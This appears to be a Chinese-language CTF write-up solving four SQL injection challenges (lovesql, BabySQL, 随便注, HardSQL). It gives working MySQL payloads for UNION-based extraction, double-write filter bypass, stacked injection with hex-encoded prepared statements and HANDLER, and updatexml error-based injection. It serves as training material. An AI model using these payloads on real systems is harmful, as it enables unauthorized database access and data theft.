lovesql
这道题是一个非常简单的sql注入 也就是万能密码 我们只需要注意在输入用户名的地方使用 ' 将语句提前终止 并且or一个为真的条件 这样整个语句的结果就为真 这就是万能密码的原理
data:image/s3,"s3://crabby-images/808cc/808cc6a7cb7e7c2c40bcbc788f7b11450e82f0d3" alt=""
data:image/s3,"s3://crabby-images/f9cea/f9cea962db372803e368e965eb4dae64929d3baa" alt=""
这样我们就得到了密码 然后我们发现这只是密码
于是查看一下字段数 尝试下注入
data:image/s3,"s3://crabby-images/31193/3119357372deb3b90c5a8ada875f444e14027e9b" alt=""
data:image/s3,"s3://crabby-images/40531/405310db5ecd8947bbf98471789efbe65837ba46" alt=""
这里我们发现3 和4的回显不同 就可以判断字段数为3
data:image/s3,"s3://crabby-images/bd67e/bd67ee291f485281ab524744c290d08f16188c77" alt=""
这里我们判断出来回显点位为2 和3 于是就可以在2和3处进行注入
data:image/s3,"s3://crabby-images/5ed85/5ed858ab6a56a8c838eb2f3f7be87bbaca78f4cb" alt=""
这里我们发现 数据库名为geek
接下来我们再进行爆表
data:image/s3,"s3://crabby-images/32c46/32c469c9f28e1d8e3b0ad0c67b28d0355e549e10" alt=""
这里我们报出来了两个字段 我们查询一下第二个
爆出来了一串非常像flag的东西
flag{2fe797a0-2714-40fb-b270-bb096bbeb772}
[极客大挑战 2019]BabySQL
data:image/s3,"s3://crabby-images/3caf9/3caf9dfa8374d95d6def637de28ace9f75084dbd" alt=""
这里我先用万能密码 发现进不去 他前面告诉了我们他做了一些东西的过滤
data:image/s3,"s3://crabby-images/c3a48/c3a48d326ae15b635cc41900e2bcecf38e1c0b5f" alt=""
data:image/s3,"s3://crabby-images/25ac5/25ac5549338d8630358d103a99d4ff881ebad7a5" alt=""
看到这里的der 再联想到前面万能密码只剩下1=1 可以看出这里将我们的or给过滤掉了 所以我们可以进行双写绕过
data:image/s3,"s3://crabby-images/64a61/64a61c26112588f52b84c383af2d5717f4af2af1" alt=""
data:image/s3,"s3://crabby-images/eb422/eb42285fb2af82ed735217f42f21e3e58167126e" alt=""
这里爆出了账户和密码 我们在进行union联合注入
data:image/s3,"s3://crabby-images/d2a54/d2a549696663d05bbe3f5827c99fe76c6d9067e2" alt=""
data:image/s3,"s3://crabby-images/fd636/fd636f5fab609d687bed30701c8e7f0415542aaf" alt=""
这里我们的联合注入 依旧报错 并且发现union 和select也被过滤了然后我们继续双写绕过
1' ununionion seselectlect 1,2,database()#
data:image/s3,"s3://crabby-images/2f69a/2f69a0a417aab1394a16b736f33386c8a166264f" alt=""
这里爆出了我们的数据库名geek
依然进行双写绕过来爆出表名
1'ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
data:image/s3,"s3://crabby-images/3b5e9/3b5e92eb614d9beb3e487f701421ed84988c9776" alt=""
我们在来查询第一个字段里的列名
1' ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
data:image/s3,"s3://crabby-images/55d44/55d4404630e3af019c30bdd98922f2b0e97b6d37" alt=""
最后在查询里面字段的全部内容
1' ununionion seselectlect 1,2,group_concat(username ,id , passwoorrd) frfromom b4bsql#
data:image/s3,"s3://crabby-images/3d653/3d65383a62e7235c90831b90078b686037930556" alt=""
就得到了想要的flag{1df5a48b-9f85-406f-a88f-e4279f49d469}
双写绕过
根据报错信息确认哪些关键词被过滤 双写该关键词通过拼接字符防止被过滤 如or被过滤 则可双写为or
[强网杯 2019]随便注
这里我们发现union select都被过滤掉了 我们推断这道题要使用堆叠注入 并且我们发现这道题的闭合方式为单引号' 然后我们进行字段判断 因为再3时回显发生变化 这里我们就可以判断 字段数为2
data:image/s3,"s3://crabby-images/c1ec5/c1ec51a18b072001eafddb2d245e9336dfba4c37" alt=""
然后我们使用堆叠注入 可以爆出数据库里的内容
1'; show databases;
data:image/s3,"s3://crabby-images/bf617/bf617803fb20c12c14668e853d99d7f413243c01" alt=""
再查看所有的数据表
1'; show tables;
data:image/s3,"s3://crabby-images/99e44/99e446f4e99a131f671fbc5bf361c0fef8ce4adc" alt=""
然后我们在爆出数据表里的内容
1';show columns from 1919810931114514
;#
data:image/s3,"s3://crabby-images/44110/44110b819d643fb36f2d94cc93edba7942af1d61" alt=""
我们在这里又得到了flag字段 然后我们在查询flag字段里的内容 因为这里的题目有过滤select所以这里我们可以利用编码来绕过select过滤
select *from where
1919810931114514``
编码过后就是1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
data:image/s3,"s3://crabby-images/c0486/c0486acd7f414149a87aefee7ee63b6afd8c0c8a" alt=""
就得到了flag{bd214b2a-2740-4ce1-9275-4d5da99c4edc}
这里我们还可以使用handler代替select
1'; handler 1919810931114514
open asa
; handler a
read next;#
这样我们依然可以得到flag
HANDLER的用法
打开表:HANDLER tablename OPEN [AS alias]
读取数据:HANDLER tablename READ indexname { = | < | > | <= | >= | LIKE } (value1,value2,...) [WHERE condition]
关闭表:HANDLER tablename CLOSE
HANDLER a read next 是读取下一行数据直到表的数据被读取完
[极客大挑战 2019]HardSQL
data:image/s3,"s3://crabby-images/1f366/1f366df6450491115a9ece2020175ed9ba8d929a" alt=""
data:image/s3,"s3://crabby-images/d271a/d271ab7d519db600e6f94daa211070a0fd26055f" alt=""
data:image/s3,"s3://crabby-images/c122f/c122fd4c2f88fbe5dbd60e96a9bcb47a657ce6a8" alt=""
这里我们使用万能密码 发现报错 并且回显的内容无任何信息 我们在这里重新构造一下万能密码
所以我们推断这道题要使用报错注入
extractvalue() 或者updatexml()
并且这里我们发现会过滤掉很多东西 空格和/**/ 所以这里我们要使用^来形成异或来绕过
1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
data:image/s3,"s3://crabby-images/d4826/d482676262e422fb4e65c874fa9d13a93b0c6f93" alt=""
这里爆出了我们的数据库名
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
data:image/s3,"s3://crabby-images/17165/17165d4e540e525442357f112fc8149bac0163b0" alt=""
这里又爆出了我们的表名
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
这里爆出了我们的列名
data:image/s3,"s3://crabby-images/020ae/020aedc5b8309adfd301cbf5bee6e5311240ae02" alt=""
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
这样就得到了一半的 flag{827f2d20-d5ea-4d06-a0
data:image/s3,"s3://crabby-images/9215e/9215eeffbb891ab4376fadb0b3e2a0561c1e0eea" alt=""
1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))#
使用函数right()就得到了另一半flag 0-d5ea-4d06-a0a0-0dfab4de9002}
data:image/s3,"s3://crabby-images/862da/862da08857976524718ba294693c887ac61abd75" alt=""
flag{827f2d20-d5ea-4d06-a0a0-0dfab4de9002}